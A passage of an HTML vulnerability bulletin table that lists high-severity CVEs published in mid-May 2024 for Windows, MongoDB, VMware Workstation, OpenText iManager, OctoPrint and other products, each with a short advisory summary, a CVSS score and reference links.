<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-29994&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29994" target="_blank">CVE-2024-29994</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29994" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Common Log File System Driver Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-29996&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29996" target="_blank">CVE-2024-29996</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29996" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30014&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30014" target="_blank">CVE-2024-30014</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30014" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30015&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30015" target="_blank">CVE-2024-30015</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30015" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Kernel Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30018&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30018" target="_blank">CVE-2024-30018</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30018" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30022&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30022" target="_blank">CVE-2024-30022</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30022" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30023&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30023" target="_blank">CVE-2024-30023</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30023" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30024&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30024" target="_blank">CVE-2024-30024</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30024" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Common Log File System Driver Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30025&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30025" target="_blank">CVE-2024-30025</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30025" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>NTFS Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30027&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30027" target="_blank">CVE-2024-30027</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30027" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Win32k Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30028&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30028" target="_blank">CVE-2024-30028</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30028" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30029&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30029" target="_blank">CVE-2024-30029</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30029" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows CNG Key Isolation Service Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30031&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30031" target="_blank">CVE-2024-30031</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30031" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows DWM Core Library Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30032&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30032" target="_blank">CVE-2024-30032</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30032" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows DWM Core Library Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30035&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30035" target="_blank">CVE-2024-30035</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30035" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Common Log File System Driver Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30037&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30037" target="_blank">CVE-2024-30037</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30037" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Win32k Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30038&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30038" target="_blank">CVE-2024-30038</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30038" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30049&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30049" target="_blank">CVE-2024-30049</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30049" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 21H2<br> </td>
<td>Microsoft PLUGScheduler Scheduled Task Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-26238&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-26238" target="_blank">CVE-2024-26238</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26238" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows Server 2008 Service Pack 2<br> </td>
<td>Win32k Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30030&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30030" target="_blank">CVE-2024-30030</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30030" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows Server 2019<br> </td>
<td>Windows Hyper-V Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30010&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30010" target="_blank">CVE-2024-30010</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30010" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows Server 2022, 23H2 Edition (Server Core installation)<br> </td>
<td>Microsoft Brokering File System Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30007&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30007" target="_blank">CVE-2024-30007</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30007" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows Server 2022<br> </td>
<td>Windows Search Service Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30033&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30033" target="_blank">CVE-2024-30033</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30033" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>MongoDB Inc--MongoDB Server<br> </td>
<td>Improper validation of certain metadata input may result in the server not correctly serialising BSON. This can be performed pre-authentication and may cause unexpected application behavior including unavailability of serverStatus responses. This issue affects MongoDB Server v7.0 versions prior to 7.0.6, MongoDB Server v6.0 versions prior to 6.0.14 and MongoDB Server v.5.0 versions prior to 5.0.25.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3372&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3372" target="_blank">CVE-2024-3372</a><br><a href="https://jira.mongodb.org/browse/SERVER-85263" target="_blank">cna@mongodb.com</a></td>
</tr>
<tr>
<td>N/A--Pk Favicon Manager<br> </td>
<td>Unrestricted Upload of File with Dangerous Type vulnerability in Pk Favicon Manager.This issue affects Pk Favicon Manager: from n/a through 2.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34416&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34416" target="_blank">CVE-2024-34416</a><br><a href="https://patchstack.com/database/vulnerability/phpsword-favicon-manager/wordpress-pk-favicon-manager-plugin-2-1-arbitrary-file-upload-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>N/A--VMware Workstation<br> </td>
<td>VMware Workstation and Fusion contain a heap buffer-overflow vulnerability in the Shader functionality. A malicious actor with non-administrative access to a virtual machine with 3D graphics enabled may be able to exploit this vulnerability to create a denial of service condition.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22268&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22268" target="_blank">CVE-2024-22268</a><br><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280" target="_blank">security@vmware.com</a></td>
</tr>
<tr>
<td>N/A--VMware Workstation<br> </td>
<td>VMware Workstation and Fusion contain an information disclosure vulnerability in the vbluetooth device. A malicious actor with local administrative privileges on a virtual machine may be able to read privileged information contained in hypervisor memory from a virtual machine.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22269&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22269" target="_blank">CVE-2024-22269</a><br><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280" target="_blank">security@vmware.com</a></td>
</tr>
<tr>
<td>N/A--VMware Workstation<br> </td>
<td>VMware Workstation and Fusion contain an information disclosure vulnerability in the Host Guest File Sharing (HGFS) functionality. A malicious actor with local administrative privileges on a virtual machine may be able to read privileged information contained in hypervisor memory from a virtual machine.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22270&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22270" target="_blank">CVE-2024-22270</a><br><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280" target="_blank">security@vmware.com</a></td>
</tr>
<tr>
<td>NA--VMware Workstation<br> </td>
<td>VMware Workstation and Fusion contain a use-after-free vulnerability in the vbluetooth device. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22267&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22267" target="_blank">CVE-2024-22267</a><br><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280" target="_blank">security@vmware.com</a></td>
</tr>
<tr>
<td>NI--FlexLogger<br> </td>
<td>A deserialization of untrusted data vulnerability exists in common code used by FlexLogger and InstrumentStudio that may result in remote code execution. Successful exploitation requires an attacker to get a user to open a specially crafted project file. This vulnerability affects NI FlexLogger 2024 Q1 and prior versions as well as NI InstrumentStudio 2024 Q1 and prior versions.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4044&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4044" target="_blank">CVE-2024-4044</a><br><a href="https://ni.com/r/CVE-2024-4044" target="_blank">security@ni.com</a></td>
</tr>
<tr>
<td>Netflix--Genie<br> </td>
<td>A path traversal issue potentially leading to remote code execution in Genie for all versions prior to 4.3.18</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4701&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L" target="_blank" title="CVSS V3 Score">9.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4701" target="_blank">CVE-2024-4701</a><br><a href="https://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2024-001.md" target="_blank">security-report@netflix.com</a></td>
</tr>
<tr>
<td>Nota-Info--Bookly<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Nota-Info Bookly allows Path Traversal, Manipulating Web Input to File System Calls.This issue affects Bookly: from n/a through 21.7.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-26526&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-26526" target="_blank">CVE-2023-26526</a><br><a href="https://patchstack.com/database/vulnerability/bookly-responsive-appointment-booking-tool/wordpress-bookly-plugin-21-7-1-authenticated-arbitrary-file-deletion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Nozomi Networks--Arc<br> </td>
<td>Multiple functions use archives without properly validating the filenames therein, rendering the application vulnerable to path traversal via 'zip slip' attacks. An administrator able to provide tampered archives to be processed by the affected versions of Arc may be able to have arbitrary files extracted to arbitrary filesystem locations. Leveraging this issue, an attacker may be able to overwrite arbitrary files on the target filesystem and cause critical impacts on the system (e.g., arbitrary command execution on the victim's machine).</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-5938&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-5938" target="_blank">CVE-2023-5938</a><br><a href="https://security.nozominetworks.com/NN-2023:16-01" target="_blank">prodsec@nozominetworks.com</a></td>
</tr>
<tr>
<td>Nozomi Networks--Arc<br> </td>
<td>When configuring Arc (e.g. during the first setup), a local web interface is provided to ease the configuration process. Such web interface lacks authentication and may thus be abused by a local attacker or malware running on the machine itself. A malicious local user or process, during a window of opportunity when the local web interface is active, may be able to extract sensitive information or change Arc's configuration. This could also lead to arbitrary code execution if a malicious update package is installed.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-5935&amp;vector=CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-5935" target="_blank">CVE-2023-5935</a><br><a href="https://security.nozominetworks.com/NN-2023:13-01" target="_blank">prodsec@nozominetworks.com</a></td>
</tr>
<tr>
<td>Nozomi Networks--Arc<br> </td>
<td>On Unix systems (Linux, MacOS), Arc uses a temporary file with unsafe privileges. By tampering with such file, a malicious local user in the system may be able to trigger arbitrary code execution with root privileges.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-5936&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-5936" target="_blank">CVE-2023-5936</a><br><a href="https://security.nozominetworks.com/NN-2023:14-01" target="_blank">prodsec@nozominetworks.com</a></td>
</tr>
<tr>
<td>OceanWP--OceanWP<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in OceanWP allows PHP Local File Inclusion.This issue affects OceanWP: from n/a through 3.4.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-23700&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-23700" target="_blank">CVE-2023-23700</a><br><a href="https://patchstack.com/database/vulnerability/oceanwp/wordpress-oceanwp-theme-3-4-1-authenticated-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>OctoPrint--OctoPrint<br> </td>
<td>OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up until and including 1.10.0 contain a vulnerability that allows an unauthenticated attacker to completely bypass the authentication if the `autologinLocal` option is enabled within `config.yaml`, even if they come from networks that are not configured as `localNetworks`, spoofing their IP via the `X-Forwarded-For` header. If autologin is not enabled, this vulnerability does not have any impact. The vulnerability has been patched in version 1.10.1. Until the patch has been applied, OctoPrint administrators who have autologin enabled on their instances should disable it and/or to make the instance inaccessible from potentially hostile networks like the internet.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32977&amp;vector=CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32977" target="_blank">CVE-2024-32977</a><br><a href="https://github.com/OctoPrint/OctoPrint/commit/5afbec8d23508edc25b0f1bdef1620580136add4" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-2vjq-hg5w-5gm7" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>OpenText--iManager<br> </td>
<td>Remote Code Execution has been discovered in OpenTextâ„¢ iManager 3.2.6.0200. The vulnerability can trigger command injection and insecure deserialization issues.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3483&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3483" target="_blank">CVE-2024-3483</a><br><a href="https://www.netiq.com/documentation/imanager-32/imanager326_patch3_hf1_releasenotes/data/imanager326_patch3_hf1_releasenotes.html" target="_blank">security@opentext.com</a></td>
</tr>
<tr>
<td>OpenText--iManager<br> </td>
<td>XML External Entity injection vulnerability found in OpenTextâ„¢ iManager 3.2.6.0200. This could lead to information disclosure and remote code execution.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3486&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3486" target="_blank">CVE-2024-3486</a><br><a href="https://www.netiq.com/documentation/imanager-32/imanager326_patch3_hf1_releasenotes/data/imanager326_patch3_hf1_releasenotes.html" target="_blank">security@opentext.com</a></td>
</tr>
<tr>
<td>OpenText--iManager<br> </td>
<td>Remote Code Execution has been discovered in OpenTextâ„¢ iManager 3.2.6.0200. The vulnerability can trigger remote code execution unisng unsafe java object deserialization.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3967&amp;vector=CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3967" target="_blank">CVE-2024-3967</a><br><a href="https://www.netiq.com/documentation/imanager-32/imanager326_patch3_hf1_releasenotes/data/imanager326_patch3_hf1_releasenotes.html" target="_blank">security@opentext.com</a></td>
</tr>
<tr>
<td>OpenText--iManager<br> </td>
<td>Remote Code Execution has been discovered in OpenTextâ„¢ iManager 3.2.6.0200. The vulnerability can trigger remote code execution using custom file upload task.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3968&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3968" target="_blank">CVE-2024-3968</a><br><a href="https://www.netiq.com/documentation/imanager-32/imanager326_patch3_hf1_releasenotes/data/imanager326_patch3_hf1_releasenotes.html" target="_blank">security@opentext.com</a></td>
</tr>
<tr>
<td>Owlet--Cam v2<br> </td>
<td>A command injection vulnerability exists in the IOCTL that manages OTA updates. A specially crafted command can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-6321&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
